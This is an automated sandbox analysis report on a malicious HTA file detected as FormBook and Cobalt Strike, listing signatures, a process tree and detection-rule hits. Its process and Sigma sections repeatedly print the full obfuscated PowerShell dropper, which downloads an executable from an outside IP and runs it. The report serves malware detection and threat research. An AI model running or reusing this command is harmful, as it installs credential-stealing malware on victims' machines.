Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
njo.hta

Overview

General Information

Sample name:njo.hta
Analysis ID:1665583
MD5:35f2168ec2d472916d0edfdd18d745cd
SHA1:0b8f26005fff271f8f056d7c06d006a4aaed2ca2
SHA256:809b32dd0caf464b9dda815143b7bf0e08d5d8da0ee8a386fbdc8ad51773ee55
Tags:htauser-abuse_ch
Infos:

Detection

Cobalt Strike, FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected Cobalt Strike Beacon
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell decode and execute
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
PowerShell case anomaly found
Powershell drops PE file
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Suspicious MSHTA Child Process
Suspicious command line found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Uncommon Svchost Parent Process
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • mshta.exe (PID: 7572 cmdline: mshta.exe "C:\Users\user\Desktop\njo.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 7664 cmdline: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7716 cmdline: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • csc.exe (PID: 8064 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
          • cvtres.exe (PID: 8108 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD004.tmp" "c:\Users\user\AppData\Local\Temp\qetstupm\CSCEF30E185BA76444FA670BC63B6F1A196.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
        • igcc.exe (PID: 2668 cmdline: "C:\Users\user\AppData\Roaming\igcc.exe" MD5: BF53CF5790AB537024A9A9C71CF399D6)
          • svchost.exe (PID: 5672 cmdline: "C:\Users\user\AppData\Roaming\igcc.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
            • WRNKS5Hlc0y.exe (PID: 1336 cmdline: "C:\Program Files (x86)\GSuVlZLJvYBiwWmRwxSqNDCqctQDFEzoiYNZPHkdLLawvxxNaIbP\lfyLlz8ui.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
              • AtBroker.exe (PID: 7400 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
                • firefox.exe (PID: 7756 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.3663915117.0000000003080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000010.00000002.3664272191.0000000003320000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000D.00000002.1614478454.0000000007480000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000D.00000002.1609453239.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000F.00000002.3675591492.0000000006A30000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            13.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              13.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Other

                SourceRuleDescriptionAuthorStrings
                amsi32_7716.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Suspicious MSHTA Child Process
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: "C:\Windows\system32\cmd.exe" "/C POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtR
                  Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7716, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", ProcessId: 8064, ProcessName: csc.exe
                  Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\igcc[1].exe
                  Sigma detected: Uncommon Svchost Parent Process
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ParentImage: C:\Users\user\AppData\Roaming\igcc.exe, ParentProcessId: 2668, ParentProcessName: igcc.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ProcessId: 5672, ProcessName: svchost.exe
                  Sigma detected: Dynamic CSharp Compile Artefact
                  Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7716, TargetFilename: C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxpZ2NjLmV4ZSI='+[CHaR]34+'))')))", CommandLine: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICA
                  Sigma detected: Windows Processes Suspicious Parent Directory
                  Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ParentImage: C:\Users\user\AppData\Roaming\igcc.exe, ParentProcessId: 2668, ParentProcessName: igcc.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\igcc.exe" , ProcessId: 5672, ProcessName: svchost.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Dot net compiler compiles file from suspicious location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qetstupm\qetstupm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: POwERsHElL.exE -Ex bypass -NOp -w 1 -C DEVIcecreDEntIalDePLoyMEnT.ExE ; IEX($(IEX('[SysteM.texT.ENCoDINg]'+[ChaR]0X3a+[ChaR]58+'utf8.getStrinG([systEm.cONveRt]'+[char]58+[cHar]58+'FrOmbAse64STRinG('+[CHar]0X22+'JFpzb2RoaDdrWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1iRVJkRWZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1Ukxtb04uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBVb2pXamtsLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhYW15WG92b08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZHY09aUFhYaCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJaUXhpdVksSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhIbCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiY09pYm9lIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxBdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRac29kaGg3a1g6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xNzIuMjQ1LjIwOC4yMS8yMzMvaWdjYy5leGUiLCIkRU5WOkFQUERBVEFcaWdjYy5leGUiLDAsMCk7c3RhUnQtc0xlZVAoMyk7aW52T0tlLWlURW0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg